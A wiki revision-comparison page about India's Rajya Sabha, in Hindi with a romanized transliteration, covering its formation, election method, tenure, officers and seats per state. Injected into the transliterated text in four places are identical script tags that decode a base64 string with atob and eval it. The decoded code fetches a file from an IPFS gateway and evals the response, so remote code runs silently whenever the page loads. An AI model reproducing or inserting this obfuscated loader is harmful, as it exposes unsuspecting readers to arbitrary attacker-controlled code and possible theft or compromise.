Difference between revisions of "राज्य सभा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
[[चित्र:Sansad-Bhavan-2.jpg|thumb|300px|[[संसद भवन]], [[नई दिल्ली]]]]
 
[[चित्र:Sansad-Bhavan-2.jpg|thumb|300px|[[संसद भवन]], [[नई दिल्ली]]]]
 
'''भारतीय संविधान''' के प्रवर्तन के बाद 'काउंसिल ऑफ स्टेट्स' (राज्यसभा) का गठन सर्वप्रथम 3 अप्रैल, [[1952]] को किया गया था। इसकी पहली बैठक 13 मई, 1952 को हुई थी। इसकी अध्यक्षता तत्कालीन [[उपराष्ट्रपति]] [[डॉ. सर्वपल्ली राधाकृष्णन]] के द्वारा की गई थी। 23 अगस्त [[1954]] को सभापति ने सदन में घोषणा की कि, ‘काउंसिल ऑफ स्टेट्स’ को अब राज्यसभा के नाम से जाना जाएगा।
 
'''भारतीय संविधान''' के प्रवर्तन के बाद 'काउंसिल ऑफ स्टेट्स' (राज्यसभा) का गठन सर्वप्रथम 3 अप्रैल, [[1952]] को किया गया था। इसकी पहली बैठक 13 मई, 1952 को हुई थी। इसकी अध्यक्षता तत्कालीन [[उपराष्ट्रपति]] [[डॉ. सर्वपल्ली राधाकृष्णन]] के द्वारा की गई थी। 23 अगस्त [[1954]] को सभापति ने सदन में घोषणा की कि, ‘काउंसिल ऑफ स्टेट्स’ को अब राज्यसभा के नाम से जाना जाएगा।
 
 
==गठन==
 
==गठन==
 
'''संविधान के अनुच्छेद 80 के अनुसार''' राज्यसभा का गठन 250 सदस्यों द्वारा होगा, इनमें से 12 सदस्यों के नाम [[राष्ट्रपति]] द्वारा निर्देशित किये जाते हैं तथा शेष 238 का चुनाव राज्य तथा संघ राज्यक्षेत्रों की विधान सभाओं के सदस्यों द्वारा किया जाता है। राज्यसभा में राज्यों तथा संघ राज्यक्षेत्रों की विधान सभाओं के लिए आवंटित स्थान को संविधान की चौथी अनुसूची में अन्तर्विष्ट किया गया है। इस अनुसूची में केवल 233 स्थानों के सम्बन्ध में उल्लेख किया गया है, जिससे स्पष्ट होता है कि, वर्तमान समय में राज्यसभा की प्रभावी संख्या 245 (राष्ट्रपति द्वारा नामित सदस्यों सहित) है। वे 12 सदस्य जिन्हें राष्ट्रपति द्वारा राज्यसभा के लिए नामित किया जाता है, उन्हें [[साहित्य]], [[विज्ञान]], [[कला]] तथा समाज सेवा के क्षेत्र में विशेष ज्ञान या व्यावहारिक अनुभव होना चाहिए।
 
'''संविधान के अनुच्छेद 80 के अनुसार''' राज्यसभा का गठन 250 सदस्यों द्वारा होगा, इनमें से 12 सदस्यों के नाम [[राष्ट्रपति]] द्वारा निर्देशित किये जाते हैं तथा शेष 238 का चुनाव राज्य तथा संघ राज्यक्षेत्रों की विधान सभाओं के सदस्यों द्वारा किया जाता है। राज्यसभा में राज्यों तथा संघ राज्यक्षेत्रों की विधान सभाओं के लिए आवंटित स्थान को संविधान की चौथी अनुसूची में अन्तर्विष्ट किया गया है। इस अनुसूची में केवल 233 स्थानों के सम्बन्ध में उल्लेख किया गया है, जिससे स्पष्ट होता है कि, वर्तमान समय में राज्यसभा की प्रभावी संख्या 245 (राष्ट्रपति द्वारा नामित सदस्यों सहित) है। वे 12 सदस्य जिन्हें राष्ट्रपति द्वारा राज्यसभा के लिए नामित किया जाता है, उन्हें [[साहित्य]], [[विज्ञान]], [[कला]] तथा समाज सेवा के क्षेत्र में विशेष ज्ञान या व्यावहारिक अनुभव होना चाहिए।
 
{{tocright}}
 
{{tocright}}
==अप्रत्यक्ष चुनाव==
+
==राज्यसभा का स्वरूप==
 +
संविधान के अनुच्छेद 80 के अनुसार राज्‍यसभा में 250 सदस्‍य होते हैं जिनमे 12 सदस्‍य [[राष्‍ट्रपति]] द्वारा नामित और बाकी 238 लोग चौथी अनुसूची में जनसंख्या के आधार पर राज्यों से चुने जाते हैं। अमेरिका की सीनेट में सभी राज्यों को बराबर प्रतिनिधित्व मिलता है और 1913 के 17वें संशोधन द्वारा वहाँ प्रत्यक्ष निर्वाचन की पद्धति लागू हो गयी है। अनुच्छेद 84 के तहत भारत का नागरिक होने के अलावा राज्‍यसभा की सदस्यता हेतु न्यूनतम आयु 30 वर्ष तय की गई जबकि निचले सदन [[लोक सभा]] के लिए यह 25 वर्ष है। संविधान के अनुच्छेद 102 में दिवालिया और कुछ अन्य वर्ग के लोगों को राज्यसभा सदस्य बनने के लिए अयोग्य घोषित किया गया है। जन प्रतिनिधित्व क़ानून की धारा 154 के अनुसार राज्‍यसभा सदस्य का कार्यकाल 6 वर्ष का होता है। हर 2 साल में इसके एक तिहाई सदस्‍य सेवानिवृत्त हो जाते हैं इसलिए राज्‍यसभा कभी भंग नहीं होती।
 +
====राज्यसभा निर्वाचन की चुनावी प्रक्रिया====
 +
राज्य सभा में सदस्यों का चुनाव राज्य विधान सभा के निर्वाचित सदस्यों द्वारा द्वारा किया जाता है जिसमें विधान परिषद् के सदस्य वोट नहीं डाल सकते। नामांकन फाइल करने के लिए न्यूनतम 10  सदस्यों की सहमति आवश्यक होती है। सदस्‍यों का चुनाव एकल हस्‍तांतरणीय मत के द्वारा निर्धारित कानून से होता है। इसके अनुसार राज्य की कुल विधानसभा सीटों को राज्यसभा की सदस्य संख्या में एक जोड़ कर उसे विभाजित किया जाता है फिर उसमें 1 जोड़ दिया जाता है। इसे इस तरह समझें कि उत्तर प्रदेश में कुल 403 विधायक हैं और 11 राज्यसभा सीट हैं जिन्हें 12 (11 + 1) से विभाजित करके फिर उसमे 1 जोड़ने पर 34 की संख्या आती है जो वहाँ चुनाव जीतने के लिए न्यूनतम वोटों की संख्या होगी। विधायक वरीयता के अनुसार अपना वोट देते हैं और पहली वरीयता के न्यूनतम वोट जिसे मिल जाते हैं वह व्यक्ति विजयी हो जाता है। इसके पश्चात यदि सदस्यों के लिए वोटिंग होती है तो सबसे कम वोट मिलने वाले उम्मीदवार के वोटों को दूसरी वरीयता के अनुसार अन्य उम्मीदवारों को ट्रान्सफर कर दिया जाता है। यह सिलसिला तब तक चलता है जब तक उम्मीदवार विजयी नहीं हो जाए। इसीलिए चुनाव होने की स्थिति में विधायकों द्वारा अन्य वरीयता के मतों का महत्व बहुत बढ़ जाता है।
 +
====अप्रत्यक्ष चुनाव====
 
'''राज्यसभा के सदस्यों का चुनाव''' अप्रत्यक्ष रूप से होता है। राज्यों के प्रतिनिधियों का चुनाव राज्यों की विधानसभा के सदस्यों द्वारा आनुपातिक प्रतिनिधित्व पद्धति के अनुसार एकल संक्रमणीय मत द्वारा किया जाता है तथा संघराज्य क्षेत्रों के प्रतिनिधियों का चुनाव उस ढंग से किया जाता है, जिसे [[संसद]] विधि बनाकर विहित करे। राज्यसभा में केवल दो संघ राज्यक्षेत्रों- यथा राष्ट्रीय राजधानी राज्य क्षेत्र [[दिल्ली]] तथा [[पाण्डिचेरी]], के लिए स्थानों को आवंटित किया गया है। इन राज्य क्षेत्रों के आवंटन में राज्यसभा के स्थानों को भरने के लिए निर्वाचकगणों को गठित करने के सम्बन्ध में लोक प्रतिनिधित्व अधिनियम, [[1950]] की धारा '27-क' में संसद द्वारा उस ढंग को विहित किया गया है, जिसके अनुसार पाण्डिचेरी संघ राज्यक्षेत्र के लिए आवंटित स्थान को इस संघ राज्य क्षेत्र के विधान सभा के सदस्यों द्वारा चुने गये व्यक्ति से भरा जाएगा तथा दिल्ली के सम्बन्ध में इस धारा में कहा गया था कि, "दिल्ली संघ राज्यक्षेत्र के राज्यसभा सदस्य का चुनाव महानगर के परिषद के निर्वाचित सदस्यों द्वारा किया जाएगा, लेकिन दिल्ली में विधानसभा के गठन के बाद स्थिति में परिवर्तन हो गया है"।
 
'''राज्यसभा के सदस्यों का चुनाव''' अप्रत्यक्ष रूप से होता है। राज्यों के प्रतिनिधियों का चुनाव राज्यों की विधानसभा के सदस्यों द्वारा आनुपातिक प्रतिनिधित्व पद्धति के अनुसार एकल संक्रमणीय मत द्वारा किया जाता है तथा संघराज्य क्षेत्रों के प्रतिनिधियों का चुनाव उस ढंग से किया जाता है, जिसे [[संसद]] विधि बनाकर विहित करे। राज्यसभा में केवल दो संघ राज्यक्षेत्रों- यथा राष्ट्रीय राजधानी राज्य क्षेत्र [[दिल्ली]] तथा [[पाण्डिचेरी]], के लिए स्थानों को आवंटित किया गया है। इन राज्य क्षेत्रों के आवंटन में राज्यसभा के स्थानों को भरने के लिए निर्वाचकगणों को गठित करने के सम्बन्ध में लोक प्रतिनिधित्व अधिनियम, [[1950]] की धारा '27-क' में संसद द्वारा उस ढंग को विहित किया गया है, जिसके अनुसार पाण्डिचेरी संघ राज्यक्षेत्र के लिए आवंटित स्थान को इस संघ राज्य क्षेत्र के विधान सभा के सदस्यों द्वारा चुने गये व्यक्ति से भरा जाएगा तथा दिल्ली के सम्बन्ध में इस धारा में कहा गया था कि, "दिल्ली संघ राज्यक्षेत्र के राज्यसभा सदस्य का चुनाव महानगर के परिषद के निर्वाचित सदस्यों द्वारा किया जाएगा, लेकिन दिल्ली में विधानसभा के गठन के बाद स्थिति में परिवर्तन हो गया है"।
 
==अवधि==
 
==अवधि==
 
 
'''राज्यसभा का कभी विघटन''' नहीं होता। इसके सदस्य 6 वर्ष के लिए चुने जाते हैं। इसके सदस्यों में से एक तिहाई सदस्य प्रत्येक दूसरे वर्ष पदमुक्त हो जाते हैं तथा पदमुक्त होने वाले सदस्यों के स्थानों को भरने के लिए प्रत्येक दूसरे वर्ष चुनाव होता है। यदि कोई सदस्य त्यागपत्र दे देता है या उसकी आकस्मिक मृत्यु के कारण कोई स्थान रिक्त होता है, तो इस रिक्त स्थान के लिए उपचुनाव होता है।
 
'''राज्यसभा का कभी विघटन''' नहीं होता। इसके सदस्य 6 वर्ष के लिए चुने जाते हैं। इसके सदस्यों में से एक तिहाई सदस्य प्रत्येक दूसरे वर्ष पदमुक्त हो जाते हैं तथा पदमुक्त होने वाले सदस्यों के स्थानों को भरने के लिए प्रत्येक दूसरे वर्ष चुनाव होता है। यदि कोई सदस्य त्यागपत्र दे देता है या उसकी आकस्मिक मृत्यु के कारण कोई स्थान रिक्त होता है, तो इस रिक्त स्थान के लिए उपचुनाव होता है।
 
==अधिवेशन==
 
==अधिवेशन==
Line 14: Line 16:
 
==पदाधिकारी==
 
==पदाधिकारी==
 
राज्यसभा के निम्नलिखित पदाधिकारी होते हैं-
 
राज्यसभा के निम्नलिखित पदाधिकारी होते हैं-
 
 
====सभापति====
 
====सभापति====
 
[[भारत]] का [[उपराष्ट्रपति]] राज्यसभा का पदेन सभापति होता है। यह राज्यसभा की कार्यवाही के संचालन तथा सदन में अनुशासन बनाये रखने के लिए उत्तरदायी होता है। सभापति राज्यसभा के नये सदस्यों को पद की शपथ दिलाता है। उपराष्ट्रपति द्वारा कार्यकारी [[राष्ट्रपति]] के रूप में कर्तव्यों के निर्वहन के दौरान राज्यसभा के सभापति के रूप में उपसभापति द्वारा दायित्वों का निर्वहन किया जाता है।
 
[[भारत]] का [[उपराष्ट्रपति]] राज्यसभा का पदेन सभापति होता है। यह राज्यसभा की कार्यवाही के संचालन तथा सदन में अनुशासन बनाये रखने के लिए उत्तरदायी होता है। सभापति राज्यसभा के नये सदस्यों को पद की शपथ दिलाता है। उपराष्ट्रपति द्वारा कार्यकारी [[राष्ट्रपति]] के रूप में कर्तव्यों के निर्वहन के दौरान राज्यसभा के सभापति के रूप में उपसभापति द्वारा दायित्वों का निर्वहन किया जाता है।
Line 21: Line 22:
 
#जब वह राज्यसभा का सदस्य न रह जाय।
 
#जब वह राज्यसभा का सदस्य न रह जाय।
 
#जब वह सभापति को अपना त्यागपत्र दे दे।  
 
#जब वह सभापति को अपना त्यागपत्र दे दे।  
#जब तक वह राज्यसभा के तत्कालीन समस्त सदस्यों के बहुमत से पारित संकल्प द्वारा अपने पद से न हटा दिया जाय, लेकिन ऐसा कोई संकल्प तब तक प्रस्तावित नहीं किया जाएगा, जब तक कि इस #संकल्प को प्रस्तावित करने के आशय की कम से कम चौदह दिन पूर्व सूचना न दे दी गई हो।
+
#जब तक वह राज्यसभा के तत्कालीन समस्त सदस्यों के बहुमत से पारित संकल्प द्वारा अपने पद से न हटा दिया जाय, लेकिन ऐसा कोई संकल्प तब तक प्रस्तावित नहीं किया जाएगा, जब तक कि इस संकल्प को प्रस्तावित करने के आशय की कम से कम चौदह दिन पूर्व सूचना न दे दी गई हो।
==अन्य व्यक्ति==
+
# जब सभापति तथा उपसभापति दोनों अनुपस्थित हों, तो राज्यसभा के सभापति के कार्यों का निर्वहन राज्यसभा का वह सदस्य करेगा, जिसका नाम राष्ट्रपति निर्देशित करे और राज्यसभा की बैठक में वह व्यक्ति सभापति के कार्यों का निर्वाह करेगा, जिसे राज्यसभा की प्रक्रिया के नियमों द्वारा या राज्यसभा द्वारा अवधारित किया जाय।
'''जब सभापति तथा उपसभापति''' दोनों अनुपस्थित हों, तो राज्यसभा के सभापति के कार्यों का निर्वहन राज्यसभा का वह सदस्य करेगा, जिसका नाम राष्ट्रपति निर्देशित करे और राज्यसभा की बैठक में वह व्यक्ति सभापति के कार्यों का निर्वाह करेगा, जिसे राज्यसभा की प्रक्रिया के नियमों द्वारा या राज्यसभा द्वारा अवधारित किया जाय।
+
# राज्य सभा में उपसभाध्यक्षों का एक पैनल भी होता है, जिसके सदस्यों का नामनिर्देशन सभापति, राज्य सभा द्वारा किया जाता है। सभापति और उपसभापति की अनुपस्थिति में, उपसभाध्यक्षों के पैनल से एक सदस्य सभा की कार्यवाही का सभापतित्व करता है। लोक सभा के विपरीत राज्यसभा का सभापति अपना इस्तीफा उपसभापति को नहीं बल्कि [[राष्ट्रपति]] को देता है।
 +
 
 +
==राज्य सभा सदस्यों की राज्यवार सूची==
 +
{| class="bharattable-pink"
 +
|-
 +
! राज्य का नाम
 +
! सदस्यों की संख्या
 +
|-
 +
| [[आंध्र प्रदेश]]
 +
| 11
 +
|-
 +
| [[अरुणाचल प्रदेश]]
 +
| 1
 +
|-
 +
| [[असम]]
 +
| 7
 +
|-
 +
| [[बिहार]]
 +
| 16
 +
|-
 +
| [[छत्तीसगढ़]]
 +
| 5
 +
|-
 +
|  [[गोवा]]
 +
| 1
 +
|-
 +
|  [[गुजरात]]
 +
| 11
 +
|-
 +
|  [[हरियाणा]]
 +
| 5
 +
|-
 +
|  [[हिमाचल प्रदेश]]
 +
| 3
 +
|-
 +
| [[जम्मू और कश्मीर]]
 +
| 4
 +
|-
 +
|  [[झारखण्ड]]
 +
| 6
 +
|-
 +
|  [[कर्नाटक]]
 +
| 12
 +
|-
 +
|  [[केरल]]
 +
| 9
 +
|-
 +
| [[मध्य प्रदेश]]
 +
| 11
 +
|-
 +
| [[महाराष्ट्र]]
 +
| 19
 +
|-
 +
|  [[मणिपुर]]
 +
| 1
 +
|-
 +
|  [[मेघालय]]
 +
| 1
 +
|-
 +
|  [[मिज़ोरम]]
 +
| 1
 +
|-
 +
| [[नागालैंड]]
 +
| 1
 +
|-
 +
| [[राष्ट्रीय राजधानी क्षेत्र दिल्ली]]
 +
| 3
 +
|-
 +
|  [[ओडिशा]]
 +
| 10
 +
|-
 +
| [[पुदुचेरी]]
 +
| 1
 +
|-
 +
|  [[पंजाब]]
 +
| 7
 +
|-
 +
| [[राजस्थान]]
 +
| 10
 +
|-
 +
|  [[सिक्किम]]
 +
| 1
 +
|-
 +
|  [[तमिलनाडु]]
 +
| 18
 +
|-
 +
|  [[तेलंगाना]]
 +
| 7
 +
|-
 +
|  [[त्रिपुरा]]
 +
| 1
 +
|-
 +
|  [[उत्तर प्रदेश]]
 +
| 31
 +
|-
 +
|  [[उत्तराखण्ड]]
 +
| 3
 +
|-
 +
|  [[पश्चिम बंगाल]]
 +
| 19
 +
|-
 +
|  नामित सदस्य
 +
| 12
 +
|}
 +
 
 +
 
 +
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
  
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{संसद}}
+
{{संसद}}{{भारत गणराज्य}}
 
[[Category:संसद]]
 
[[Category:संसद]]
 
[[Category:कार्यपालिका]]
 
[[Category:कार्यपालिका]]
 
[[Category:राज्यसभा]]
 
[[Category:राज्यसभा]]
 
__INDEX__
 
__INDEX__

Revision as of 11:18, 23 March 2018

[[chitr:Sansad-Bhavan-2.jpg|thumb|300px|sansad bhavan, nee dilli]] bharatiy sanvidhan ke pravartan ke bad 'kauansil aauph stets' (rajyasabha) ka gathan sarvapratham 3 aprail, 1952 ko kiya gaya tha. isaki pahali baithak 13 mee, 1952 ko huee thi. isaki adhyakshata tatkalin uparashtrapati d aau. sarvapalli radhakrishnan ke dvara ki gee thi. 23 agast 1954 ko sabhapati ne sadan mean ghoshana ki ki, ‘kauansil aauph stets’ ko ab rajyasabha ke nam se jana jaega.

gathan

sanvidhan ke anuchchhed 80 ke anusar rajyasabha ka gathan 250 sadasyoan dvara hoga, inamean se 12 sadasyoan ke nam rashtrapati dvara nirdeshit kiye jate haian tatha shesh 238 ka chunav rajy tatha sangh rajyakshetroan ki vidhan sabhaoan ke sadasyoan dvara kiya jata hai. rajyasabha mean rajyoan tatha sangh rajyakshetroan ki vidhan sabhaoan ke lie avantit sthan ko sanvidhan ki chauthi anusoochi mean antarvisht kiya gaya hai. is anusoochi mean keval 233 sthanoan ke sambandh mean ullekh kiya gaya hai, jisase spasht hota hai ki, vartaman samay mean rajyasabha ki prabhavi sankhya 245 (rashtrapati dvara namit sadasyoan sahit) hai. ve 12 sadasy jinhean rashtrapati dvara rajyasabha ke lie namit kiya jata hai, unhean sahity, vijnan, kala tatha samaj seva ke kshetr mean vishesh jnan ya vyavaharik anubhav hona chahie.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rajyasabha ka svaroop

sanvidhan ke anuchchhed 80 ke anusar rajh‍yasabha mean 250 sadash‍y hote haian jiname 12 sadash‍y rashh‍trapati dvara namit aur baki 238 log chauthi anusoochi mean janasankhya ke adhar par rajyoan se chune jate haian. amerika ki sinet mean sabhi rajyoan ko barabar pratinidhitv milata hai aur 1913 ke 17vean sanshodhan dvara vahaan pratyaksh nirvachan ki paddhati lagoo ho gayi hai. anuchchhed 84 ke tahat bharat ka nagarik hone ke alava rajh‍yasabha ki sadasyata hetu nyoonatam ayu 30 varsh tay ki gee jabaki nichale sadan lok sabha ke lie yah 25 varsh hai. sanvidhan ke anuchchhed 102 mean divaliya aur kuchh any varg ke logoan ko rajyasabha sadasy banane ke lie ayogy ghoshit kiya gaya hai. jan pratinidhitv qanoon ki dhara 154 ke anusar rajh‍yasabha sadasy ka karyakal 6 varsh ka hota hai. har 2 sal mean isake ek tihaee sadash‍y sevanivritt ho jate haian isalie rajh‍yasabha kabhi bhang nahian hoti.

rajyasabha nirvachan ki chunavi prakriya

rajy sabha mean sadasyoan ka chunav rajy vidhan sabha ke nirvachit sadasyoan dvara dvara kiya jata hai jisamean vidhan parishadh ke sadasy vot nahian dal sakate. namaankan phail karane ke lie nyoonatam 10 sadasyoan ki sahamati avashyak hoti hai. sadash‍yoan ka chunav ekal hash‍taantaraniy mat ke dvara nirdharit kanoon se hota hai. isake anusar rajy ki kul vidhanasabha sitoan ko rajyasabha ki sadasy sankhya mean ek jo d kar use vibhajit kiya jata hai phir usamean 1 jo d diya jata hai. ise is tarah samajhean ki uttar pradesh mean kul 403 vidhayak haian aur 11 rajyasabha sit haian jinhean 12 (11 + 1) se vibhajit karake phir usame 1 jo dane par 34 ki sankhya ati hai jo vahaan chunav jitane ke lie nyoonatam votoan ki sankhya hogi. vidhayak variyata ke anusar apana vot dete haian aur pahali variyata ke nyoonatam vot jise mil jate haian vah vyakti vijayi ho jata hai. isake pashchat yadi sadasyoan ke lie votiang hoti hai to sabase kam vot milane vale ummidavar ke votoan ko doosari variyata ke anusar any ummidavaroan ko transaphar kar diya jata hai. yah silasila tab tak chalata hai jab tak ummidavar vijayi nahian ho jae. isilie chunav hone ki sthiti mean vidhayakoan dvara any variyata ke matoan ka mahatv bahut badh jata hai.

apratyaksh chunav

rajyasabha ke sadasyoan ka chunav apratyaksh roop se hota hai. rajyoan ke pratinidhiyoan ka chunav rajyoan ki vidhanasabha ke sadasyoan dvara anupatik pratinidhitv paddhati ke anusar ekal sankramaniy mat dvara kiya jata hai tatha sangharajy kshetroan ke pratinidhiyoan ka chunav us dhang se kiya jata hai, jise sansad vidhi banakar vihit kare. rajyasabha mean keval do sangh rajyakshetroan- yatha rashtriy rajadhani rajy kshetr dilli tatha pandicheri, ke lie sthanoan ko avantit kiya gaya hai. in rajy kshetroan ke avantan mean rajyasabha ke sthanoan ko bharane ke lie nirvachakaganoan ko gathit karane ke sambandh mean lok pratinidhitv adhiniyam, 1950 ki dhara '27-k' mean sansad dvara us dhang ko vihit kiya gaya hai, jisake anusar pandicheri sangh rajyakshetr ke lie avantit sthan ko is sangh rajy kshetr ke vidhan sabha ke sadasyoan dvara chune gaye vyakti se bhara jaega tatha dilli ke sambandh mean is dhara mean kaha gaya tha ki, "dilli sangh rajyakshetr ke rajyasabha sadasy ka chunav mahanagar ke parishad ke nirvachit sadasyoan dvara kiya jaega, lekin dilli mean vidhanasabha ke gathan ke bad sthiti mean parivartan ho gaya hai".

avadhi

rajyasabha ka kabhi vighatan nahian hota. isake sadasy 6 varsh ke lie chune jate haian. isake sadasyoan mean se ek tihaee sadasy pratyek doosare varsh padamukt ho jate haian tatha padamukt hone vale sadasyoan ke sthanoan ko bharane ke lie pratyek doosare varsh chunav hota hai. yadi koee sadasy tyagapatr de deta hai ya usaki akasmik mrityu ke karan koee sthan rikt hota hai, to is rikt sthan ke lie upachunav hota hai.

adhiveshan

rajyasabha ka ek varsh mean do bar adhiveshan hota hai, lekin isake adhiveshan ki antim baithak tatha agami adhiveshan ki pratham baithak ke lie niyat tithi ke bich 6 mah ka antar nahian hona chahie. samanyataya rajyasabha ka adhiveshan tabhi bulaya jata hai, jab lokasabha ka adhiveshan bulaya jata hai. parantu sanvidhan ke anuchchhed 352, 356 tatha 360 ke adhin apat kal ki ghoshana ke bad tab rajy sabha ka vishesh adhiveshan bulaya ja sakata hai, jab lokasabha ka vighatan ho gaya ho.

padadhikari

rajyasabha ke nimnalikhit padadhikari hote haian-

sabhapati

bharat ka uparashtrapati rajyasabha ka paden sabhapati hota hai. yah rajyasabha ki karyavahi ke sanchalan tatha sadan mean anushasan banaye rakhane ke lie uttaradayi hota hai. sabhapati rajyasabha ke naye sadasyoan ko pad ki shapath dilata hai. uparashtrapati dvara karyakari rashtrapati ke roop mean kartavyoan ke nirvahan ke dauran rajyasabha ke sabhapati ke roop mean upasabhapati dvara dayitvoan ka nirvahan kiya jata hai.

upasabhapati

rajyasabha apane sadasyoan mean se kisi ko apana upasabhapati chunegi aur jab upasabhapati ka pad rikt hota hai, tab rajyasabha kisi any sadasy ko apana upasabhapati chunegi. is prakar chuna gaya upasabhapati, sabhapati ki anupasthiti mean usake karyoan ka nirvah karata hai. 14 mee, 2002 ko sansad dvara parit vidheyak ke anusar upasabhapati ko kendriy rajy mantri ke saman bhatta dene ka pravadhan kiya gaya hai. up sabhapati nimnalikhit sthiti mean apana pad rikt kar sakata hai-

  1. jab vah rajyasabha ka sadasy n rah jay.
  2. jab vah sabhapati ko apana tyagapatr de de.
  3. jab tak vah rajyasabha ke tatkalin samast sadasyoan ke bahumat se parit sankalp dvara apane pad se n hata diya jay, lekin aisa koee sankalp tab tak prastavit nahian kiya jaega, jab tak ki is sankalp ko prastavit karane ke ashay ki kam se kam chaudah din poorv soochana n de di gee ho.
  4. jab sabhapati tatha upasabhapati donoan anupasthit hoan, to rajyasabha ke sabhapati ke karyoan ka nirvahan rajyasabha ka vah sadasy karega, jisaka nam rashtrapati nirdeshit kare aur rajyasabha ki baithak mean vah vyakti sabhapati ke karyoan ka nirvah karega, jise rajyasabha ki prakriya ke niyamoan dvara ya rajyasabha dvara avadharit kiya jay.
  5. rajy sabha mean upasabhadhyakshoan ka ek painal bhi hota hai, jisake sadasyoan ka namanirdeshan sabhapati, rajy sabha dvara kiya jata hai. sabhapati aur upasabhapati ki anupasthiti mean, upasabhadhyakshoan ke painal se ek sadasy sabha ki karyavahi ka sabhapatitv karata hai. lok sabha ke viparit rajyasabha ka sabhapati apana istipha upasabhapati ko nahian balki rashtrapati ko deta hai.

rajy sabha sadasyoan ki rajyavar soochi

rajy ka nam sadasyoan ki sankhya
aandhr pradesh 11
arunachal pradesh 1
asam 7
bihar 16
chhattisagadh 5
gova 1
gujarat 11
hariyana 5
himachal pradesh 3
jammoo aur kashmir 4
jharakhand 6
karnatak 12
keral 9
madhy pradesh 11
maharashtr 19
manipur 1
meghalay 1
mizoram 1
nagalaiand 1
rashtriy rajadhani kshetr dilli 3
odisha 10
puducheri 1
panjab 7
rajasthan 10
sikkim 1
tamilanadu 18
telangana 7
tripura 1
uttar pradesh 31
uttarakhand 3
pashchim bangal 19
namit sadasy 12



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>